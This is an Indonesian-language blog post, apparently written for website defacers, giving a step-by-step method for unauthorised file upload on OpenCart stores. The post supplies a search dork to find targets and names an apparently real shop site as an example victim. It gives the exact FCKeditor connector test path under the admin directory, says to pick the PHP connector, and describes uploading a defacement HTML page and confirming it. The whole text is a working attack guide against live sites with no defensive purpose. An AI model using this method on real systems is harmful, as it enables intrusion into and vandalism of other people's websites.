Remote File Upload Opencart (deface)
dork : Powered By OpenCart site:com
"site:" terserah, yang penting support opencart
ex target: http://www.harleypartsintl.com/
bisa juga dgn trget www.target.com/pacth/ itu kalo dpt trget yg ad di /patch/ nya
ex: http://www.target.com/patch/
nah kalo dh dpt trget, lngsung aj kita inject exploitnya
for exploit :
Quote:admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
jdi nya gni
ex: http://www.harleypartsintl.com/admin/vie.../test.html
kalo target yang ad /patch/ , inject nya d belakang patch nya
ex:www.target.com/patch/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
liat yg kluar, dstu trdpat tmpat upload file nya.....
connector pilih PHP
lngsung aja kita upload file html deface kita...
jika berhasil mka akan kluar alert sprti ini
Code:
"file uploaded with no errors"
liat file kita , apkah telah d upload dgn mengklik "Get Folders and Files"
skrng liat hasilnya....
ex hasil: http://www.harleypartsintl.com/h-n.html
sayangnya file yang kita upload nggk bisa nimpa file sblm nya, tetapi duplikat file...file(1).html or file(2).html..
Tidak ada komentar:
Posting Komentar